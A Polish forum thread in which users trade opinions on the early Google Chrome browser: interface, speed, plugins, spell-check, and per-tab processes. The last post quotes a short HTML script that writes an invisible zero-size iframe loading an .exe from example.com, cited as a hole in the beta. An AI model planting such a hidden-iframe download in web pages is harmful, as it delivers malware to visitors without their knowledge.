Pokaż wyniki od 1 do 10 z 10
  1. #1
    Użytkownik
    Dołączył
    08-08-2007
    Skąd
    Mexico[TBG]
    Posty
    107

    Domyślnie

    Co sądzicie o najnowszym produkcie internetowego giganta. Jak oceniacie tą przeglądarkę?
    Czytałem że zawiera dużo bugów I czy opłaca się ją instalować i zamienić za FF 3

  2. #2
    Dawni Moderatorzy
    Dołączył
    11-11-2006
    Skąd
    Polska
    Posty
    524

    Domyślnie

    jak dla mnie mało przejrzysty interfejs.

  3. #3
    Użytkownik
    Dołączył
    21-02-2008
    Posty
    246

    Domyślnie

    Dosyć dobra, ma całkiem cwane rozwiązanie z tymi ostatnimi kartami które wyswietla jako miniaturki i dalej liste, szukanie w historii na wierzchu.. poza tym - nie opłaca się. jak na razie prawie żadnych pluginów itd i bardzo niestabilna potrafi być

  4. #4
    Khalt
    Guest

    Domyślnie

    Ja powiem tyle:
    Lepsza od IE, gorsza od FF ^^.

  5. #5
    Użytkownik
    Dołączył
    13-07-2007
    Skąd
    WLKP
    Posty
    190

    Domyślnie

    Chodzi szybciej niż FF, używam kilka miechów. Trochę brakuje pluginów, ale kiedyś będą.. ;] Wkurza mnie to, że cały czas podkreśla na czerwono błedy pisowni, choć piszę bez błędów

  6. #6
    Użytkownik
    Dołączył
    21-02-2008
    Posty
    246

    Domyślnie

    bo ma domyślnie ang słownik

  7. #7
    Dawni Moderatorzy Avatar widmo17
    Dołączył
    16-07-2007
    Skąd
    irc.freenode.net #bimbrow
    Posty
    974

    Domyślnie

    Nie używałem jej, bo aj law fajerfox ale podoba mi się rozwiązanie że każda karta ma osobny proces - jakby ktoś przypadkiem wlazł na own3d.es nie musi zakańczać całego procesu przeglądarki tylko zakańcza proces karty ;] A tak z tymi błędami... Po 2-4 dniach po wydaniu chrome pokazało się 4 exploity, które nie były takie banalne ;]

    HOMEPAGE - http://widmo.soa1.org - programowanie, security, serwery.

  8. #8
    Użytkownik
    Dołączył
    13-07-2007
    Skąd
    WLKP
    Posty
    190

    Domyślnie

    Gondoller chyba nie do końca, bo w podpowiedziach ma polskie wyrazy i nie podkresla wszystkich wyrazów

  9. #9
    Khalt
    Guest

    Domyślnie

    Pewnie jakiś słownik 'nie ten' ściągnąłeś xP.

  10. #10
    Użytkownik (R)
    Dołączył
    11-03-2007
    Skąd
    Piła
    Posty
    819

    Domyślnie

    Jak dla mnie jak na google, jest strasznym nie wypałem, nie wiem jak jest teraz, ale te pierwsze banalne dziury mnie strasznie zniechęciły, co prawda wersja beta wtedy była, ale to nie zmienia faktu, że można było nie zabezpieczyć przeglądarki np przed:
    Kod:
    <script>
    document.write(&#39;<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">&#39;);
    </script>

Podobne wątki

  1. Jak automatycznie zapisywać hasła w google chrome
    Przez kusiaczek2001
    w forum Dla początkujących
    Odpowiedzi: 4
    Ostatni post / autor: 08-03-2014, 15:08
  2. Jak działa automatyczna instalacja Google Chrome
    Przez Darxis
    w forum HTML, CSS, JavaScript
    Odpowiedzi: 3
    Ostatni post / autor: 24-08-2013, 22:52
  3. google chrome
    Przez majkelo25
    w forum Narzędzia sieciowe
    Odpowiedzi: 2
    Ostatni post / autor: 18-08-2012, 17:26
  4. hasła wpisywane w chrome
    Przez xdannyx
    w forum Narzędzia sieciowe
    Odpowiedzi: 1
    Ostatni post / autor: 06-08-2012, 23:40
  5. Google chrome nie działa
    Przez Fikoł1910
    w forum Inne narzędzia
    Odpowiedzi: 3
    Ostatni post / autor: 19-11-2011, 11:27

Uprawnienia

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •